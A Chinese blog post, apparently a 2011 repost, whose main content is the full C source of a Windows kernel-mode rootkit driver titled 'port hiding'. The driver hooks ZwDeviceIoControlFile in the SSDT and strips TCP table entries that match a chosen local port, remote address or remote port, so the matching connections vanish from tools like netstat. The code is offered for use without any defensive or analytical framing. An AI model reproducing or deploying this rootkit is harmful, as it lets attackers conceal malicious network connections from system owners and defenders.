BCB-DG's Blog

...

日志

关于我

BCB-DG

old programer

文章分类

Rootkit端口隐藏

2011-03-02 08:52:51| 分类： Delphi | 标签： |举报 |字号大中小订阅

下载LOFTER 我的照片书 |

//轉

#include "ntddk.h"
#include
#include
#include
#include "netType.h"

#define NT_DEVICE_NAME L"\\Device\\HidePort"
#define DOS_DEVICE_NAME L"\\DosDevices\\HidePort"

#pragma pack(1) //SSDT表的结构
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase; //Used only in checked build
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

//------------------------- 函数声明--------------------- [5/22/2008 WinDDK]
NTSTATUS DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    );

VOID OnUnload(
IN PDRIVER_OBJECT DriverObject
);

//设备通讯
NTSTATUS HideProtDispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

//设备打开关闭
NTSTATUS HidePortDispatchCreateClose(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

// ------------------------------------------------------ [5/22/2008 WinDDK]

NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile(
IN HANDLE               FileHandle,
IN HANDLE               Event OPTIONAL,
IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
IN PVOID                ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK    IoStatusBlock,
IN ULONG                IoControlCode,
IN PVOID                InputBuffer OPTIONAL,
IN ULONG                InputBufferLength,
OUT PVOID               OutputBuffer OPTIONAL,
IN ULONG                OutputBufferLength );

NTSTATUS NTAPI NewZwDeviceIoControlFile(
IN HANDLE               FileHandle,
IN HANDLE               Event OPTIONAL,
IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
IN PVOID                ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK    IoStatusBlock,
IN ULONG                IoControlCode,
IN PVOID                InputBuffer OPTIONAL,
IN ULONG                InputBufferLength,
OUT PVOID               OutputBuffer OPTIONAL,
IN ULONG                OutputBufferLength );

typedef NTSTATUS (*ZWDEVICECONTROLIOFILE)(
IN HANDLE               FileHandle,
IN HANDLE               Event OPTIONAL,
IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
IN PVOID                ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK    IoStatusBlock,
IN ULONG                IoControlCode,
IN PVOID                InputBuffer OPTIONAL,
IN ULONG                InputBufferLength,
OUT PVOID               OutputBuffer OPTIONAL,
IN ULONG                OutputBufferLength
);

ZWDEVICECONTROLIOFILE OldZwDeviceIoControlFile = NULL;
PMDL m_MDL = NULL;
PVOID *m_Mapped = NULL;

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; //变量名是不能变的,因为是从外部导入

#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)_function+1)]
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig) \
_Orig = (PVOID)InterlockedExchange((PLONG)&m_Mapped[SYSCALL_INDEX(_Function)], (LONG)_Hook)
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
InterlockedExchange((PLONG)&m_Mapped[SYSCALL_INDEX(_Function)], (LONG)_Hook)

#include "HidePort.h"

#pragma alloc_text(INIT,DriverEntry)
#pragma alloc_text(PAGE,OnUnload)
#pragma alloc_text(PAGE,NewZwDeviceIoControlFile)
#pragma alloc_text(PAGE,HideProtDispatchDeviceControl)
#pragma alloc_text(PAGE,HidePortDispatchCreateClose)

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING dosDeviceName;

UNHOOK_SYSCALL(ZwDeviceIoControlFile,OldZwDeviceIoControlFile,NewZwDeviceIoControlFile);

if(m_MDL){
MmUnmapLockedPages(m_Mapped,m_MDL);
IoFreeMdl(m_MDL);
}

//------删除设备对象------ [5/22/2008 WinDDK]
RtlInitUnicodeString(&dosDeviceName, DOS_DEVICE_NAME);
IoDeleteSymbolicLink(&dosDeviceName);
IoDeleteDevice(DriverObject->DeviceObject);

KdPrint(("驱动卸载完毕... "));
}

NTSTATUS DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
NTSTATUS ntStatus = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = NULL;
UNICODE_STRING ntDeviceName, dosDeviceName;
BOOLEAN fSymbolicLink = FALSE;

RtlInitUnicodeString(&ntDeviceName, NT_DEVICE_NAME);

//创建设备对象
ntStatus = IoCreateDevice(
DriverObject,
0, // DeviceExtensionSize
&ntDeviceName, // DeviceName
FILE_DEVICE_UNKNOWN, // DeviceType
0, // DeviceCharacteristics
FALSE, // Exclusive
&DeviceObject // [OUT]
);

if (!NT_SUCCESS(ntStatus))
{
KdPrint(("创建设备对象失败:%X ", ntStatus));
goto __failed;
}

RtlInitUnicodeString(&dosDeviceName, DOS_DEVICE_NAME);
ntStatus = IoCreateSymbolicLink(&dosDeviceName, &ntDeviceName);

if (!NT_SUCCESS(ntStatus)) {
KdPrint(("创建符号链接失败:%X ", ntStatus));
goto __failed;
}

fSymbolicLink = TRUE;

//指定分发
DriverObject->MajorFunction[IRP_MJ_CREATE]         = HidePortDispatchCreateClose;
DriverObject->MajorFunction[IRP_MJ_CLOSE]          = HidePortDispatchCreateClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = HideProtDispatchDeviceControl;
DriverObject->DriverUnload                         = OnUnload;

// --------------修改SSDT------------ [5/22/2008 Admin]

m_MDL = MmCreateMdl( NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4 );
if(!m_MDL)
return STATUS_UNSUCCESSFUL;

//非分页内存
MmBuildMdlForNonPagedPool(m_MDL);

m_MDL->MdlFlags = m_MDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

//锁定
m_Mapped = MmMapLockedPages(m_MDL, KernelMode);
HOOK_SYSCALL(ZwDeviceIoControlFile,NewZwDeviceIoControlFile,OldZwDeviceIoControlFile);

KdPrint(("驱动启动成功... "));

return ntStatus;

__failed:

if (fSymbolicLink)
IoDeleteSymbolicLink(&dosDeviceName);

if (DeviceObject)
IoDeleteDevice(DeviceObject);

return ntStatus;
}

//设备通讯
NTSTATUS HideProtDispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus;
PIO_STACK_LOCATION IrpStack = IoGetCurrentIrpStackLocation(Irp);
PVOID lpInBuffer = NULL;
ULONG nInBufferSize, nOutBufferSize, dwIoControlCode;

Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;

//获得输入缓冲区空间地址
lpInBuffer = Irp->AssociatedIrp.SystemBuffer;
nInBufferSize = IrpStack->Parameters.DeviceIoControl.InputBufferLength;
nOutBufferSize = IrpStack->Parameters.DeviceIoControl.OutputBufferLength;

dwIoControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;

switch (dwIoControlCode)
{
case IOCTL_SET_LOCAL_CONTROL:
{
   HideType = 1;
   memcpy(&LocalPort,lpInBuffer,sizeof(ULONG));
   KdPrint(("设置为本地端口模式...%ld ",LocalPort));
   break;
}
case IOCTL_SET_RHOST_CONTROL:
{
   HideType = 2;
   memcpy(&RemoteHost,lpInBuffer,sizeof(ULONG));
   KdPrint(("设置为远程地址模式...0x%x ",RemoteHost));
   break;
}

case IOCTL_SET_RPORT_CONTROL:
{
   HideType = 3;
   memcpy(&RemotePort,lpInBuffer,sizeof(ULONG));
   KdPrint(("设置为远程端口模式...%ld ",RemotePort));
   break;
}

default:
Irp->IoStatus.Status = STATUS_INVALID_PARAMETER;
break;
}

ntStatus = Irp->IoStatus.Status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);

return ntStatus;
}

//设备打开关闭
NTSTATUS HidePortDispatchCreateClose(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus;

Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;

ntStatus = Irp->IoStatus.Status;
IoCompleteRequest(Irp, IO_NO_INCREMENT);

return ntStatus;
}

NTSTATUS NTAPI NewZwDeviceIoControlFile(
          IN HANDLE               FileHandle,
          IN HANDLE               Event OPTIONAL,
          IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
          IN PVOID                ApcContext OPTIONAL,
          OUT PIO_STATUS_BLOCK    IoStatusBlock,
          IN ULONG                IoControlCode,
          IN PVOID                InputBuffer OPTIONAL,
          IN ULONG                InputBufferLength,
          OUT PVOID               OutputBuffer OPTIONAL,
          IN ULONG                OutputBufferLength
          )
{
TCP_REQUEST_QUERY_INFORMATION_EX req;
ULONG NumCount = 0;
ULONG i = 0;
TCPAddrEntry* TcpTable = NULL;
TCPAddrExEntry* TcpTableEx = NULL;

//调用旧函数
NTSTATUS ntStatus = ((ZWDEVICECONTROLIOFILE)OldZwDeviceIoControlFile)(
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength);

//判断是否为查询TCP连接信息
if (IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX)
return ntStatus;

//原函数返回不成功
if (!NT_SUCCESS(ntStatus))
return ntStatus;
//获得输入缓冲区
memcpy(&req,InputBuffer,sizeof(TDIObjectID));

if ( (req.ID.toi_entity.tei_entity == CO_TL_ENTITY)
&&(req.ID.toi_entity.tei_instance == 0)
&&(req.ID.toi_class == INFO_CLASS_PROTOCOL)
&&(req.ID.toi_type == INFO_TYPE_PROVIDER)
) //判断是否为端口查询
{
//普通查询
if (req.ID.toi_id == TCP_MIB_ADDRTABLE_ENTRY_ID)
{
NumCount = IoStatusBlock->Information / sizeof(TCPAddrEntry);
TcpTable = (TCPAddrEntry*)OutputBuffer;

   //循环链表,找到并修改需要隐藏的端口
   for(i = 0; i < NumCount; i++) {
    //模式为本地端口
    if (HideType == 1) {
     if( ntohs(TcpTable[i].tae_ConnLocalPort) == LocalPort) {
      KdPrint(("普通隐藏[本地端口] %d ", ntohs(TcpTable[i].tae_ConnLocalPort)));
      memcpy((TcpTable+i), (TcpTable+i+1), ((NumCount-i-1)*sizeof(TCPAddrEntry)));
      NumCount--;
      i--;
     }
    }

    //模式为远程地址
    if (HideType == 2) {
     if (TcpTable[i].tae_ConnRemAddress == RemoteHost) {
      KdPrint(("普通隐藏[远程地址] 0x%x ", TcpTable[i].tae_ConnRemAddress));
      memcpy((TcpTable+i), (TcpTable+i+1), ((NumCount-i-1)*sizeof(TCPAddrEntry)));
      NumCount--;
      i--;
     }
    }

    //模式为远程端口
    if (HideType == 3) {
     if (ntohs(TcpTable[i].tae_ConnRemPort) == RemotePort) {
      KdPrint(("普通隐藏[远程端口] %d ", ntohs(TcpTable[i].tae_ConnRemPort)));
      memcpy((TcpTable+i), (TcpTable+i+1), ((NumCount-i-1)*sizeof(TCPAddrEntry)));
      NumCount--;
      i--;
     }
    }
   }

IoStatusBlock->Information = NumCount*sizeof(TCPAddrEntry);
}

//带进程PID的查询
if (req.ID.toi_id == TCP_MIB_ADDRTABLE_ENTRY_EX_ID)
{
NumCount = IoStatusBlock->Information / sizeof(TCPAddrExEntry);
TcpTableEx = (TCPAddrExEntry*)OutputBuffer;

//循环链表
for(i = 0; i < NumCount; i++) {

    //为本地端口模式
    if (HideType == 1) {
     if( ntohs(TcpTableEx[i].tae_ConnLocalPort) == LocalPort) {
      KdPrint(("扩展隐藏[本地端口] %d ", ntohs(TcpTableEx[i].tae_ConnLocalPort)));
      memcpy((TcpTableEx+i), (TcpTableEx+i+1), ((NumCount-i-1)*sizeof(TCPAddrExEntry)));
      NumCount--;
      i--;
     }
    }

    //当前为远程地址模式
    if (HideType == 2) {
     if (TcpTableEx[i].tae_ConnRemAddress == RemoteHost){
      KdPrint(("扩展隐藏[远程地址] 0x%x ", TcpTableEx[i].tae_ConnRemAddress));
      memcpy((TcpTableEx+i), (TcpTableEx+i+1), ((NumCount-i-1)*sizeof(TCPAddrExEntry)));
      NumCount--;
      i--;
     }
    }

    //远程端口模式
    if (HideType == 3) {
     if ( ntohs(TcpTableEx[i].tae_ConnRemPort) == RemotePort) {
      KdPrint(("扩展隐藏[远程端口] %d ", ntohs(TcpTableEx[i].tae_ConnRemPort)));
      memcpy((TcpTableEx+i), (TcpTableEx+i+1), ((NumCount-i-1)*sizeof(TCPAddrExEntry)));
      NumCount--;
      i--;
     }
    }
   }

IoStatusBlock->Information = NumCount*sizeof(TCPAddrExEntry);
}
}

return ntStatus;
}

评论这张

转发至微博

阅读(1692)| 评论(0)

历史上的今天

this.p={  m:2,
              b:2,
              loftPermalink:'',
              id:'fks_094069093094087070081085094095087094083065087084083068',
              blogTitle:'Rootkit端口隐藏',
              blogAbstract:'//轉<br\><p\>#include \"ntddk.h\" <br\> #include <br\> #include <br\> #include <br\> #include \"netType.h\"</p\> <p\>#define NT_DEVICE_NAME L\"\\\\Device\\\\HidePort\" <br\> #define DOS_DEVICE_NAME L\"\\\\DosDevices\\\\HidePort\"</p\> <p\>#pragma pack(1) //SSDT表的结构 <br\> typedef struct ServiceDescriptorEntry { <br\> unsigned int *ServiceTableBase; <br\> unsigned int *ServiceCounterTableBase; //Used only in checked build <br\> unsigned int NumberOfServices; </p\>',
              blogTag:'',
              blogUrl:'blog/static/3822325720112285251353',
              isPublished:1,
              istop:false,
              type:2,
              modifyTime:0,
              publishTime:1299027171353,
              permalink:'blog/static/3822325720112285251353',
              commentCount:0,
              mainCommentCount:0,
              recommendCount:0,
              bsrk:-100,
              publisherId:0,
              recomBlogHome:false,
              currentRecomBlog:false,
              attachmentsFileIds:[],
              vote:{},
              groupInfo:{},
              friendstatus:'none',
              followstatus:'unFollow',
              pubSucc:'',
              visitorProvince:'',
              visitorCity:'',
              visitorNewUser:false,
              postAddInfo:{},
              mset:'000',
              mcon:'',
              srk:-100,
              remindgoodnightblog:false,
              isBlackVisitor:false,
              isShowYodaoAd:false,
              hostIntro:'old programer',
              hmcon:'1',
              selfRecomBlogCount:'0',
              lofter_single:'<iframe width="140" height="560" style="overflow:hidden;" src="http://www.lofter.com/mailEntry.do?blogad=1&blog" frameBorder="0"></iframe>'
            }

{list a as x}
    {if !!x}
    <div class="iblock nbw-fce nbw-f40">
      <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.visitorName}/">
      {if x.visitorName==visitor.userName}
      <img alt="${x.visitorNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.visitorName)}&r=${visitor.imageUpdateTime}"/>
      {else}
      <img alt="${x.visitorNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.visitorName)}"/>
      {/if}
      </a>
      <div class="cwd vname thide">
        {if x.moveFrom=='wap'}
          <a class="noul pnt" target="_blank" href="http://blog.163.com/services/wapblog.html?frompersonalbloghome"><span title="来自网易手机博客" class="iblock wapIcon"> </span></a>
        {elseif x.moveFrom=='iphone'}
          <a class="noul pnt" target="_blank"><span title="来自iPhone客户端" class="iblock iphoneIcon"> </span></a>
        {elseif x.moveFrom=='android'}
          <a class="noul pnt" target="_blank"><span title="来自Android客户端" class="iblock androidIcon"> </span></a>
        {elseif x.moveFrom=='mobile'}
          <a class="noul pnt" target="_blank" href="http://blog.163.com/services/emsblog.html?frompersonalbloghome"><span title="来自网易短信写博" class="iblock wapIcon"> </span></a>
        {/if}
        <a class="fc03 m2a"  target="_blank" hidefocus="true" href="http://blog.163.com/${x.visitorName}/">
          ${fn(x.visitorNickname,8)|escape}
        </a>
      </div>
    </div>
    {/if}
    {/list}

<#--最新日志，群博日志--> <#--推荐日志-->

<p class="fc06">推荐过这篇日志的人：</p>
    <div>
      {list a as x}
      {if !!x}
      <div class="iblock nbw-fce nbw-f40">
        <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.recommenderName}/">
        <img alt="${x.recommenderNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.recommenderName)}"/>
        </a>
        <div class="cwd thide">
          <a class="fc03 m2a" target="_blank" hidefocus="true" href="http://blog.163.com/${x.recommenderName}/">
            ${fn(x.recommenderNickname,6)|escape}
          </a>
        </div>
      </div>
      {/if}
      {/list}
    </div>
    {if !!b&&b.length>0}
    <p  class="fc06">他们还推荐了：</p>
    <ul>
    {list b as y}
      {if !!y}
        <li class="rrb"><span class="iblock">·</span><a class="fc03 m2a" target="_blank" href="http://blog.163.com/${y.recommendBlogPermalink}/?from=blog/static/3822325720112285251353">${y.recommendBlogTitle|escape}</a></li>
      {/if}
    {/list}
    </ul>
    {/if}

<#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇，下一篇--> <#-- 热度 -->

{list a as x}
    {if !!x}
    <div class="hotItem iblock nbw-fce nbw-f40">
      <a class="fc03 noul" target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/">
      {if x.publisherUsername==visitor.userName}
      <img alt="${x.publisherNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.publisherUsername)}&r=${visitor.imageUpdateTime}"/>
      {else}
      <img alt="${x.publisherNickname|escape}" onerror="this.src=location.f40" class="cwd bdwa bdc0" src="${fn1(x.publisherUsername)}"/>
      {/if}
      </a>
      <div class="cwd vname thide">
        <a class="fc03 m2a"  target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/">
          ${fn(x.publisherNickname,8)|escape}
        </a>
      </div>
      <a class="f-myLikeIcons hottype {if x.type==1} js-liketype{elseif x.type==2} js-reblogtype{elseif x.type==3} js-sharetype{else}{/if}" target="_blank" hidefocus="true" href="http://blog.163.com/${x.publisherUsername}/"> </a>
    </div>
    {/if}
    {/list}

<#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->

页脚

我的照片书 - 手机博客 - 下载LOFTER APP - 订阅此博客

BCB-DG's Blog

导航

日志

Rootkit端口隐藏

历史上的今天

最近读者

热度

评论

页脚